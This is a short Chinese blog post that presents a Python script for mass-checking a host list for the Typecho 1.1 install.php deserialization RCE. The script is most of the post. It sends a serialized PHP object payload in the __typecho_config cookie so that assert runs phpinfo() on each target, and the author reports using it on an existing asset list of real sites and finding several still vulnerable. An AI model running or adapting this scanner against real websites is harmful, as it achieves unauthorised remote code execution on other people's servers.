Typecho 1.1 反序列化漏洞批量检测脚本
  • 2020-07-22


前言

之前有写TP1.1RCE的复现。想着现成的资产列表里肯定有些没有提升版本和没删除install.php文件的漏网之鱼,于是写了个小教本来做批量检测。

脚本

import requests

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"}
with open('typecho.txt', 'r') as f:
    for line in f:
        line = line.strip('\n')
        url = 'http://' + line
        try:
            response= requests.get(url, headers=headers, timeout=2).status_code
            if response== 200:
                t = url+"/install.php?finish=123"
                response=requests.get(t,headers={"Referer":t,"Cookie":"__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo2OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NzoiY29udGVudCI7czoxOiIxIjtzOjQ6ImxpbmsiO3M6MToiMSI7czo0OiJkYXRlIjtpOjE1NDA5OTY2MDg7czo4OiJjYXRlZ29yeSI7YToxOntpOjA7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJwaHBpbmZvKCkiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJwaHBpbmZvKCkiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9"})
                if ("phpinfo" in response.text):
                    print('打得开:'+url+"存在漏洞")
                else:
                    print('打得开:'+url+"不存在漏洞")
                with open('1.txt', 'a+') as f1:
                    error = f1.write(line+'\n')
            else:
                print("打不开"+url)
        except Exception as e:
            print("访问异常"+url)

效果

下面是效果图,由于这个漏洞确实有点时间了,18年末就有了,所以最终只找到了五六个站还存在。

不出所料,都已经变成什么亚博体育之类的BC网站了。

5f17385364f55.png

5f213ca7c582d.png